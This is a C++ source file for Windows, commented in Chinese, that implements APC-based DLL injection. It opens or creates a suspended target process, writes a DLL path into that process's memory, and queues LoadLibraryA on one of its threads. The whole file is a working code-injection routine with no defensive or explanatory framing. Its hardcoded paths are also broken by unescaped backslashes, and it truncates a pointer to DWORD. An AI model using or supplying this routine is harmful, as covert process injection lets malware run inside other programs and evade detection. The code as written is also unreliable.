1 #include <iostream> 2 #include <Windows.h> 3 #include <TlHelp32.h> 4 5 using namespace std; 6 7 /* 8 APC注入条件: 9 目标线程处于可唤醒状态 10 如使用以下API时就处于可唤醒状态 11 SleepEx, SignalObjectAndWait, WaitForSingleObjectEx, WaitForMultipleObjectsEx,MsgWaitForMultipleObjectsEx 12 参数dwPid默认为0,表示自动创建目标进程并立刻生效注入,否则,注入现有目标,等待目标唤醒时执行APC回调 13 */ 14 BOOL APCInject(char *dllUrl,DWORD dwPid=0,char *exeUrl=NULL); 15 16 int main(void) 17 { 18 19 cout << APCInject("c:\desktop\test.dll",3980) << endl; 20 return 0; 21 } 22 23 BOOL APCInject(char *dllUrl,DWORD dwPid,char *exeUrl) 24 { 25 HANDLE hSnap=NULL,hPro=NULL,hThr=NULL; 26 BOOL bOk = FALSE; 27 LPVOID hVir = NULL; 28 THREADENTRY32 te = {0}; 29 30 if (!dwPid) 31 { 32 STARTUPINFO wi = {0}; 33 PROCESS_INFORMATION pi = {0}; 34 35 wi.cb = sizeof(wi); 36 CreateProcessA("c:\desktop\123.exe",NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&wi,&pi); 37 hPro = pi.hProcess; 38 hThr = pi.hThread; 39 } else { 40 te.dwSize = sizeof(te); 41 hPro = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwPid); 42 if (!hPro) 43 return FALSE; 44 hSnap = CreateToolhelp32Snapshot(4,dwPid); 45 bOk = Thread32First(hSnap,&te); 46 while (bOk) 47 { 48 if (te.th32OwnerProcessID == dwPid) 49 { 50 hThr = OpenThread(THREAD_ALL_ACCESS,FALSE,te.th32ThreadID); 51 break; 52 } 53 54 bOk = Thread32Next(hSnap,&te); 55 } 56 CloseHandle(hSnap); 57 } 58 59 if (!hThr) 60 return FALSE; 61 hVir = VirtualAllocEx(hPro,NULL,strlen(dllUrl)+1,MEM_COMMIT,PAGE_READWRITE); 62 if (!hVir) 63 return FALSE; 64 if (!WriteProcessMemory(hPro,hVir,dllUrl,strlen(dllUrl)+1,NULL)) 65 return FALSE; 66 CloseHandle(hPro); 67 if (QueueUserAPC((PAPCFUNC)GetProcAddress(GetModuleHandle("kernel32.dll"),"LoadLibraryA"),hThr,(DWORD)hVir)) 68 { 69 if (!dwPid) 70 { 71 ResumeThread(hThr); 72 CloseHandle(hThr); 73 } 74 return TRUE; 75 } 76 CloseHandle(hThr); 77 return FALSE; 78 }